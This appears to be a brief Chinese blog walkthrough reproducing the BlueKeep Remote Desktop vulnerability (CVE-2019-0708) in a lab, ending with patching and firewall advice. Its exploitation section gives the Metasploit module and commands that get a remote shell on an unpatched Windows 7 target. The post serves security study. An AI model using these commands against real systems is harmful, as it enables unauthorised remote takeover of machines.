前言

趁着最近这段时间有空先鸽几篇文章

漏洞说明

远程代码执行漏洞(远程桌面3389)
此漏洞是2019年披露的windows远程桌面服务的漏洞,编号为CVE-2019-0708,该漏洞在不需身份认证的情况下可远程触发,攻击者可利用此漏洞getshell,危害性挺大的,影响范围极广

漏洞影响版本

1
2
3
4
5
Windows 7
Windows server 2008 R2
Windows server 2008
Windows 2003
Windows xp

漏洞利用

环境准备

靶机:windows 7 IP:192.168.1.75(关闭防火墙)

攻击机:kali2-5.10.0

漏洞检测

漏洞检测工具下载:链接

  1. 打开靶机,开启远程桌面服务
  2. 利用漏洞检测工具扫描靶机,发现存在该漏洞

漏洞利用

下面用Metasploit利用该漏洞getshell

  1. 打开攻击机,进入msf控制台,找到漏洞利用模块
  2. 输入以下命令以利用漏洞
    1
    2
    3
    4
     use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
    set rhosts 192.168.1.75
    set target 1 #可先用show target命令查看执行攻击目标
    exploit
  3. 成功getshell

漏洞修复建议

  1. 下载对应补丁包
  2. 关闭rdp远程桌面服务
  3. 开启防火墙